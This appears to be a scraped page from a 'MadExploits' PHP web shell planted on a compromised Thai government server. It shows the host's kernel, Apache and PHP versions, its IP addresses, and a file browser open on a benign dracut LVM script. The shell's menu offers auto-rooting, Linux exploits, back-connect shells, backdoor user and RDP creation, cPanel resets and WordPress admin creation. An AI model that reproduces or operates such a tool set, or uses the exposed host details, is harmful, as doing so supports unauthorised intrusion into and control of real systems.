Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
dracut /
modules.d /
90lvm /
[ HOME SHELL ]
Name
Size
Permission
Action
64-lvm.rules
657
B
-rw-r--r--
check
631
B
-rwxr-xr-x
install
1.11
KB
-rwxr-xr-x
lvm_scan.sh
2.2
KB
-rwxr-xr-x
parse-lvm.sh
525
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check
#!/bin/bash # We depend on dm_mod being loaded [ "$1" = "-d" ] && echo dm # No point trying to support lvm if the binaries are missing which lvm >/dev/null 2>&1 || exit 1 . $dracutfunctions [[ $debug ]] && set -x is_lvm() { [[ $(get_fs_type /dev/block/$1) = LVM2_member ]]; } [[ $1 = '-h' ]] && { rootdev=$(find_root_block_device) if [[ $rootdev ]]; then # root lives on a block device, so we can be more precise about # hostonly checking check_block_and_slaves is_lvm "$rootdev" || exit 1 else # root is not on a block device, use the shotgun approach blkid | grep -q LVM2_member || exit 1 fi } exit 0
Close